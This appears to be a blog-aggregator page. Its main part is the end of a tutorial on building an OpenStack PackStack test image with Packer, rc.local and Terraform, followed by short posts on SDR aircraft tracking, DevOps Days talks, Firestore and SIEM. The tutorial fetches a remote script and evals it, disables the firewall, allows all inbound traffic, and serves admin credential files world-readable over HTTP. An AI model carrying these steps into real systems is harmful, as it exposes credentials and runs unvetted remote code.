  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF
+
+ systemctl stop openstack-cinder-backup.service
+ systemctl stop openstack-cinder-scheduler.service
+ systemctl stop openstack-cinder-volume.service
+ systemctl stop openstack-nova-cert.service
+ systemctl stop openstack-nova-compute.service
+ systemctl stop openstack-nova-conductor.service
+ systemctl stop openstack-nova-consoleauth.service
+ systemctl stop openstack-nova-novncproxy.service
+ systemctl stop openstack-nova-scheduler.service
+ systemctl stop neutron-dhcp-agent.service
+ systemctl stop neutron-l3-agent.service
+ systemctl stop neutron-lbaasv2-agent.service
+ systemctl stop neutron-metadata-agent.service
+ systemctl stop neutron-openvswitch-agent.service
+ systemctl stop neutron-metering-agent.service
+
+ mysql -e "update services set deleted_at=now(), deleted=id" cinder
+ mysql -e "update services set deleted_at=now(), deleted=id" nova
+ mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
+ for i in $(openstack network agent list -c ID -f value); do
+   neutron agent-delete $i
+ done
+
+ systemctl stop httpd

The above added 3 pieces to deploy.sh: set the hostname to localhost, stop all OpenStack services, and then delete all known agents for Cinder, Nova, and Neutron.

Now, with the above in place, run… no, not yet, either.

Remember the last step outlined in the beginning of this post:

Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

How is the new virtual machine going to configure itself with new information? One solution is to create an rc.local file and place it in the /etc directory during the Packer provisioning phase. This way, when the virtual machine launches, rc.local is triggered and acts as a post-boot script.

Adding an rc.local File

First, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

+ cp /home/centos/files/rc.local /etc
+ chmod +x /etc/rc.local

Next, create a file called rc.local inside the packstack/files directory:

#!/bin/bash
set -x

export HOME=/root

sleep 60

systemctl restart rabbitmq-server
while [[ true ]]; do
  pgrep -f rabbit
  if [[ $? == 0 ]]; then
    break
  fi
  sleep 10
  systemctl restart rabbitmq-server
done

nova-manage cell_v2 discover_hosts

The above is pretty simple: it's simply restarting RabbitMQ and running nova-manage to re-discover itself as a compute node.

Why restart RabbitMQ? I have no idea. I've found it needs to be done for OpenStack to work correctly.

I also mentioned I'll show how to to access the OpenStack services from outside the virtual machine, so you don't have to log in to the virtual machine to run tests.

To do that, add the following to rc.local:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

+ public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
+ if [[ -n $public_ip ]]; then
+   while true ; do
+     mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
+     if [[ $? == 0 ]]; then
+       break
+     fi
+     sleep 10
+   done

+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
+   sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
+ fi

  systemctl restart rabbitmq-server
  while [[ true ]]; do
    pgrep -f rabbit
    if [[ $? == 0 ]]; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

+ systemctl restart openstack-cinder-api.service
+ systemctl restart openstack-cinder-backup.service
+ systemctl restart openstack-cinder-scheduler.service
+ systemctl restart openstack-cinder-volume.service
+ systemctl restart openstack-nova-cert.service
+ systemctl restart openstack-nova-compute.service
+ systemctl restart openstack-nova-conductor.service
+ systemctl restart openstack-nova-consoleauth.service
+ systemctl restart openstack-nova-novncproxy.service
+ systemctl restart openstack-nova-scheduler.service
+ systemctl restart neutron-dhcp-agent.service
+ systemctl restart neutron-l3-agent.service
+ systemctl restart neutron-lbaasv2-agent.service
+ systemctl restart neutron-metadata-agent.service
+ systemctl restart neutron-openvswitch-agent.service
+ systemctl restart neutron-metering-agent.service
+ systemctl restart httpd

  nova-manage cell_v2 discover_hosts

+ iptables -I INPUT -p tcp --dport 80 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
+ cp /root/keystonerc* /var/www/html
+ chmod 666 /var/www/html/keystonerc*

Three steps have been added above:

The first uses cloud-init to discover the virtual machine's public IP. Once the public IP is known, the endpoint table in the keystone database is updated with it. By default, PackStack sets the endpoints of the Keystone catalog to 127.0.0.1. This prevents outside interaction of OpenStack. Changing it to the public IP resolves this issue.

The keystonerc_demo and keystonerc_admin files are also updated with the public IP.

Why not just set the public IP in the PackStack answer file? Because the public IP will not be known until the virtual machine launches, which is after PackStack has run. And that's why 127.0.0.1 was used earlier: it's an easy placeholder to search and replace with and it will still create a working OpenStack environment if it wasn't replaced.

The second stop restarts all OpenStack services so they're aware of the new endpoints.

The third step copies the keystonerc_demo and keystonerc_admin files to /var/www/html/. This way, you can wget the files from http://public-ip/keystonerc_demo and http://public-ip/keystonerc_admin and save them to your workstation. You can then source them and begin interacting with OpenStack remotely.

Now, with all of that in place, re-run Packer:

$ pwd
/home/jtopjian/terraform-openstack-test/packer/openstack
$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Using the Image

When the build is complete, you will have a new image called packstack-ocata that you can create a virtual machine with.

As an example, you can use Terraform to launch the image:

variable "key_name" {}
variable "network_id" {}

variable "pool" {
  default = "public"
}

variable "flavor" {
  default = "m1.xlarge"
}

data "openstack_images_image_v2" "packstack" {
  name        = "packstack-ocata"
  most_recent = true
}

resource "random_id" "security_group_name" {
  prefix      = "openstack_test_instance_allow_all_"
  byte_length = 8
}

resource "openstack_networking_floatingip_v2" "openstack_acc_tests" {
  pool = "${var.pool}"
}

resource "openstack_networking_secgroup_v2" "openstack_acc_tests" {
  name        = "${random_id.security_group_name.hex}"
  description = "Rules for openstack acceptance tests"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_1" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_2" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_3" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_4" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_5" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "icmp"
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_6" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "icmp"
  remote_ip_prefix  = "::/0"
}

resource "openstack_compute_instance_v2" "openstack_acc_tests" {
  name            = "openstack_acc_tests"
  image_id        = "${data.openstack_images_image_v2.packstack.id}"
  flavor_name     = "${var.flavor}"
  key_pair        = "${var.key_name}"
  security_groups = ["${openstack_networking_secgroup_v2.openstack_acc_tests.name}"]

  network {
    uuid = "${var.network_id}"
  }
}

resource "openstack_compute_floatingip_associate_v2" "openstack_acc_tests" {
  instance_id = "${openstack_compute_instance_v2.openstack_acc_tests.id}"
  floating_ip = "${openstack_networking_floatingip_v2.openstack_acc_tests.address}"
}

resource "null_resource" "rc_files" {
  provisioner "local-exec" {
    command = <<EOF
      while true ; do
        wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_demo 2> /dev/null
        if [ $? = 0 ]; then
          break
        fi
        sleep 20
      done

      wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_admin
    EOF
  }
}

The above Terraform configuration will do the following:

  1. Search for the latest image titled "openstack-ocata".
  2. Create a floating IP.
  3. Create a security group with a unique name and six rules to allow all TCP, UDP, and ICMP traffic.
  4. Launch an instance using the "openstack-ocata" image.
  5. Associate the floating IP to the instance.
  6. Poll the instance every 20 seconds to see if http://publicip/keystonerc_demo is available. When it is available, download it, along with keystonerc_admin.

To run this Terraform configuration, do:

$ terraform apply \
    -var "key_name=<keypair name>" \
    -var "network_id=<network uuid>" \
    -var "pool=<pool name>" \
    -var "flavor=<flavor name>"

Conclusion

This blog post detailed how to create a reusable image with OpenStack Ocata already installed. This allows you to create a standard testing environment in a fraction of the time that it takes to build the environment from scratch.

October 07, 2017 06:00 AM

October 05, 2017

The Lone Sysadmin

Stop Chrome Autoplay

If you didn’t catch this on Twitter: If you use Google Chrome, go to chrome://flags/#autoplay-policy and set it to “Document user activation is required.” Boom: no more auto-playing videos. You’re welcome. — Chris Meadows (@robotech_master) October 3, 2017 In short, go to chrome://flags/#autoplay-policy and set it to “Document user activation required.” It’s funny how simple things […]

The post Stop Chrome Autoplay appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 05, 2017 04:35 PM

October 04, 2017

Steve Kemp's Blog

Tracking aircraft in real-time, via software-defined-radio

So my last blog-post was about creating a digital-radio, powered by an ESP8266 device, there's a joke there about wireless-control of a wireless. I'm not going to make it.

Sticking with a theme this post is also about radio, software-defined radio. I know almost nothing about SDR, except that it can be used to let your computer "do stuff" with radio. The only application I've ever read about that seemed interesting was tracking aircraft.

This post is about setting up a Debian GNU/Linux system to do exactly that, show aircraft in real-time above your head! This was almost painless to setup.

  • Buy the hardware.
  • Plug in the hardware.
  • Confirm it is detected.
  • Install the appropriate sdr development-package(s).
  • Install the magic software.
    • Written by @antirez, no less, you know it is gonna be good!

So I bought this USB device from AliExpress for the grand total of €8.46. I have no idea if that URL is stable, but I suspect it is probably not. Good luck finding something similar if you're living in the future!

Once I connected the Antenna to the USB stick, and inserted it into a spare slot it showed up in the output of lsusb:

  $ lsusb
  ..
  Bus 003 Device 043: ID 0bda:2838 Realtek Semiconductor Corp. RTL2838 DVB-T
  ..

In more detail I see the major/minor numbers:

  idVendor           0x0bda Realtek Semiconductor Corp.
  idProduct          0x2838 RTL2838 DVB-T

So far, so good. I installed the development headers/library I needed:

  # apt-get install librtlsdr-dev libusb-1.0-0-dev

Once that was done I could clone antirez's repository, and build it:

  $ git clone https://github.com/antirez/dump1090.git
  $ cd dump1090
  $ make

And run it:

  $ sudo ./dump1090 --interactive --net

This failed initially as a kernel-module had claimed the device, but removing that was trivial:

  $ sudo rmmod dvb_usb_rtl28xxu
  $ sudo ./dump1090 --interactive --net

Once it was running I'd see live updates on the console, every second:

  Hex    Flight   Altitude  Speed   Lat       Lon       Track  Messages Seen       .
  --------------------------------------------------------------------------------
  4601fc          14200     0       0.000     0.000     0     11        1 sec
  4601f2          9550      0       0.000     0.000     0     58        0 sec
  45ac52 SAS1716  2650      177     60.252    24.770    47    26        1 sec

And opening a browser pointing at http://localhost:8080/ would show that graphically, like so:

NOTE: In this view I'm in Helsinki, and the airport is at Vantaa, just outside the city.

Of course there are tweaks to be made:

  • With the right udev-rules in place it is possible to run the tool as non-root, and blacklist the default kernel module.
  • There are other forks of the dump1090 software that are more up-to-date to explore.
  • SDR can do more than track planes.

October 04, 2017 09:00 PM

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 3

Sanjeev Sharma – When DevOps met SRE: From Apollo 13 to Google SRE

  • Author of Two DevOps Bookks
  • Apollo 13
    • Who were the real heroes? The guys back at missing control. The Astronaunts just had to keep breathing and not die
  • Best Practice for Incident management
    • Prioritize
    • Prepare
    • Trust
    • Introspec
    • Consider Alternatives
    • Practice
    • Change it around
  • Big Hurdles to adoption of DevOps in Enterprise
    • Literature is Only looking at one delivery platform at a time
    • Big enterprise have hundreds of platforms with completely different technologies, maturity levels, speeds. All interdependent
    • He Divides
      • Industrialised Core – Value High, Risk Low, MTBF
      • Agile/Innovation Edge – Value Low, Risk High, Rapid change and delivery, MTTR
      • Need normal distribution curve of platforms across this range
      • Need to be able to maintain products at both ends in one IT organisation
  • 6 capabilities needed in IT Organisation
    • Planning and architecture.
      • Your Delivery pipeline will be as fast as the slowest delivery pipeline it is dependent on
    • APIs
      • Modernizing to Microservices based architecture: Refactoring code and data and defining the APIs
    • Application Deployment Automation and Environment Orchestration
      • Devs are paid code, not maintain deployment and config scripts
      • Ops must provide env that requires devs to do zero setup scripts
    • Test Service and Environment Virtualisation
      • If you are doing 2week sprints, but it takes 3-weeks to get a test server, how long are your sprints
    • Release Management
      • No good if 99% of software works but last 1% is vital for the business function
    • Operational Readiness for SRE
      • Shift between MTBF to MTTR
      • MTTR  = Mean time to detect + Mean time to Triage + Mean time to restore
      • + Mean time to pass blame
    • Antifragile Systems
      • Things that neither are fragile or robust, but rather thrive on chaos
      • Cattle not pets
      • Servers may go red, but services are always green
    • DevOps: “Everybody is responsible for delivery to production”
    • SRE: “(Everybody) is responsible for delivering Continuous Business Value”

Share

by simon at October 04, 2017 03:04 AM

October 03, 2017

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 2

Marcus Bristol (Pushpay) – Moving fast without crashing

  • Low tolerance for errors in production due to being in finance
  • Deploy twice per day
  • Just Culture – Balance safety and accountability
    • What rule?
    • Who did it?
    • How bad was the breach?
    • Who gets to decide?
  • Example of Retributive Culture
    • KPIs reflect incidents.
    • If more than 10% deploys bad then affect bonus
    • Reduced number of deploys
  • Restorative Culture
  • Blameless post-mortem
    • Can give detailed account of what happened without fear or retribution
    • Happens after every incident or near-incident
    • Written Down in Wiki Page
    • So everybody has the chance to have a say
    • Summary, Timeline, impact assessment, discussion, Mitigations
    • Mitigations become highest-priority work items
  • Our Process
    • Feature Flags
    • Science
    • Lots of small PRs
    • Code Review
    • Testers paired to devs so bugs can be fixed as soon as found
    • Automated tested
    • Pollination (reviews of code between teams)
    • Bots
      • Posts to Slack when feature flag has been changed
      • Nags about feature flags that seems to be hanging around in QA
      • Nags about Flags that have been good in prod for 30+ days
      • Every merge
      • PRs awaiting reviews for long time (days)
      • Missing postmortun migrations
      • Status of builds in build farm
      • When deploy has been made
      • Health of API
      • Answer queries on team member list
      • Create ship train of PRs into a build and user can tell bot to deploy to each environment

Share

by simon at October 03, 2017 10:39 PM

DevOps Days Auckland 2017 – Wednesday Session 1

Michael Coté – Not actually a DevOps Talk

Digital Transformation

  • Goal: deliver value, weekly reliably, with small patches
  • Management must be the first to fail and transform
  • Standardize on a platform: special snow flakes are slow, expensive and error prone (see his slide, good list of stuff that should be standardize)
  • Ramping up: “Pilot low-risk apps, and ramp-up”
  • Pair programming/working
    • Half the advantage is people speed less time on reddit “research”
  • Don’t go to meetings
  • Automate compliance, have what you do automatic get logged and create compliance docs rather than building manually.
  • Crafting Your Cloud-Native Strategy

Sajeewa Dayaratne – DevOps in an Embedded World

  • Challenges on Embedded
    • Hardware – resource constrinaed
    • Debugging – OS bugs, Hardware Bugs, UFO Bugs – Oscilloscopes and JTAG connectors are your friend.
    • Environment – Thermal, Moisture, Power consumption
    • Deploy to product – Multi-month cycle, hard of impossible to send updates to ships at sea.
  • Principles of Devops , equally apply to embedded
    • High Frequency
    • Reduce overheads
    • Improve defect resolution
    • Automate
    • Reduce response times
  • Navico
    • Small Sonar, Navigation for medium boats, Displays for sail (eg Americas cup). Navigation displays for large ships
    • Dev around world, factory in Mexico
  • Codebase
    • 5 million lines of code
    • 61 Hardware Products supported – Increasing steadily, very long lifetimes for hardware
    • Complex network of products – lots of products on boat all connected, different versions of software and hardware on the same boat
  • Architecture
    • Old codebase
    • Backward compatible with old hardware
    • Needs to support new hardware
    • Desire new features on all products
  • What does this mean
    • Defects were found too late
    • Very high cost of bugs found late
    • Software stabilization taking longer
    • Manual test couldn’t keep up
    • Cost increasing , including opportunity cost
  • Does CI/CD provide answer?
    • But will it work here?
    • Case Study from HP. Large-Scale Agile Development by Gary Gruver
  • Our Plan
    • Improve tolls and archetecture
    • Build Speeds
    • Automated testing
    • Code quality control
  • Previous VCS
    • Proprietary tool with limit support and upgrades
    • Limited integration
    • Lack of CI support
    • No code review capacity
  • Move to git
    • Code reviews
    • Integrated CI
    • Supported by tools
  • Archetecture
    • Had a configurable codebase already
    • Fairly common hardware platform (only 9 variations)
    • Had runtime feature flags
    • But
      • Cyclic dependancies – 1.5 years to clean these up
      • Singletons – cut down
      • Promote unit testability – worked on
      • Many branches – long lived – mega merges
  • Went to a single Branch model, feature flags, smaller batch sizes, testing focused on single branch
  • Improve build speed
    • Start 8 hours to build Linux platform, 2 hours for each app, 14+ hours to build and package a release
    • Options
      • Increase speed
      • Parallel Builds
    • What did
      • ccache.clcache
      • IncrediBuild
      • distcc
    • 4-5hs down to 1h
  • Test automation
    • Existing was mock-ups of the hardware to not typical
    • Started with micro-test
      • Unit testing (simulator)
      • Unit testing (real hardware)
    • Build Tools
      • Software tools (n2k simulator, remote control)
      • Hardware tools ( Mimic real-world data, re purpose existing stuff)
    • UI Test Automation
      • Build or Buy
      • Functional testing vs API testing
      • HW Test tools
      • Took 6 hours to do full test on hardware.
  • PipeLine
    • Commit -> pull request
    • Automated Build / Unit Tests
    • Daily QA Build
  • Next?
    • Configuration as code
    • Code Quality tools
    • Simulate more hardware
    • Increase analytics and reporting
    • Fully simulated test env for dev (so the devs don’t need the hardware)
    • Scale – From internal infrastructure to the cloud
    • Grow the team
  • Lessons Learnt
    • Culture!
    • Collect Data
    • Get Executive Buy in
    • Change your tolls and processes if needed
    • Test automation is the key
      • Invest in HW
      • Silulate
      • Virtualise
    • Focus on good software design for Everything

Share

by simon at October 03, 2017 09:29 PM

Sean's IT Blog

Coming Soon – The Virtual Horizon Podcast #blogtober

I’ve been blogging now for about seven or so years, and The Virtual Horizon has existed in it’s current form for about two or three years.

So what’s next?  Besides for more blogging, that is…

It’s time to go multimedia.  In the next few weeks, I will be launching The Virtual Horizon Podcast.  The podcast will only partially focus on the latest in end-user computing, and I hope to cover other topics such as career development, community involvement, and even other technologies that exist outside of the EUC space.

I’m still working out some of the logistics and workflow, but the first episode has already been recorded.  It should post in the next couple of weeks.

So keep an eye out here.  I’ll be adding a new section to the page once we’re a bit closer to go-live.


by seanpmassey at October 03, 2017 05:37 PM

Sarah Allen

ultimate serverless combo: Firestore + Functions

Serverless development just got easier — today’s release of Cloud Firestore with event triggers for Cloud Functions combine to offer significant developer velocity from idea to production to scale.

I’ve worked on dozens of mobile and web apps and have always been dismayed by the amount of boilerplate code needed to shuffle data between client and server and implement small amounts of logic on the server-side. Serverless APIs + serverless compute reduce the amount of code needed to write an app, increasing velocity throughout the development cycle. Less code means fewer bugs.

Cloud Firestore + Cloud Functions with direct-from-mobile access enabled by Firebase Auth and Firebase Rules combine to deliver something very new in this space. Unhosted Web apps are also enabled by Web SDKs.

It is not a coincidence that I’ve worked on all of these technologies since joining Google last year. My first coding project at Google was developing the initial version of the Firestore UI in the Firebase Console. I then stepped into an engineering management role, leading the engineering teams that work on server-side code where Firebase enables access to Google Cloud.

Cloud Firestore

  • Realtime sync across Web and mobile clients: This is not just about realtime apps. Building user interfaces is substantially easier: using reactive patterns and progressively filling in details allows apps to be ready for user interaction faster.
  • Scales with the size of the result set: Simple apps are simple. For complex apps, you still need to be thoughtful about modeling your data, and the reward is that anything that works for you and your co-workers will scale to everyone on the planet using your app. From my perspective, this is the most significant and exciting property of the Cloud Firestore.
  • iOS, Android and Web SDKs

Cloud Functions

  • Events for create, write, update, and delete (learn how)
  • Write and deploy JavaScript functions that do exactly and only what you need
  • You can also use TypeScript (JS SDKs include typings)

All the Firebase things

  • Free tier and when you exceed that, you only pay for what you use.
  • Zero to planet scale: no sharding your database, no calculating how many servers you need, focus on how your app works.
  • Secure data access with Firebase Rules: simple, yet powerful declarative syntax to specify what data can be accessed by client code. For example, some data may be read-only access for social sharing or public parts of an app, user data might be only written by that user, and some other data may be only written by server-code.
  • Firebase Auth: all the social logins, email/password, phone or you can write code for custom auth
  • Lots more Firebase things

All this combines to allow developers to focus on building an app, writing new code that offers unique value. It’s been a while since I’ve been actually excited about new technology that has immediate and practical use cases. I’m so excited to be able to use this tech in the open for my side projects, and can’t wait to see the serious new apps…..

by sarah at October 03, 2017 05:07 PM

October 02, 2017

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – September 2017

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts/topics this
month:
  1. Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge.  Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” … 
  2. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here.
  3. Simple Log Review Checklist Released!” is often at the top of this list – this aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
  4. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials. 
  5. “SIEM Bloggables”  is a very old post , more like a mini-paper on  some key aspects of SIEM, use cases, scenarios, etc as well as 2 types of SIEM users.
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X of the traffic of this blog]: 

Current research on SIEM:
Planned research on SOAR (security orchestration,  automation and response):
Planned research on MSSP:

Miscellaneous fun posts:

(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Previous post in this endless series:

by Anton Chuvakin (anton@chuvakin.org) at October 02, 2017 03:13 PM

Everything Sysadmin

Final reminder: "DNS as Code" talk at NYCDevOps tonight!

  • Topic: DNSControl: "DNS as Code" from StackOverflow.com
  • Speaker: Thomas A. Limoncelli, SRE Manager @ Stack Overflow
  • Date: Monday, October 2, 2017
  • Time: 6:30-9:30 PM (SPECIAL TIME AND LOCATION)
  • Location: Madison Suite, Hilton Midtown, 1335 6th Ave, New York, NY 10019
  • https://www.meetup.com/nycdevops/events/243369226/

VelocityNYC is in town this week. They've graciously provided space for us to host an additional meeting. Space is limited! RSVP soon! Full details and RSVP.

We will be going out for drinks after the talk.

by Tom Limoncelli at October 02, 2017 03:00 PM

Errata Security

Microcell through a mobile hotspot

I accidentally acquired a tree farm 20 minutes outside of town. For utilities, it gets electricity and basic phone. It doesn't get water, sewer, cable, or DSL (i.e. no Internet). Also, it doesn't really get cell phone service. While you can get SMS messages up there, you usually can't get a call connected, or hold a conversation if it does.

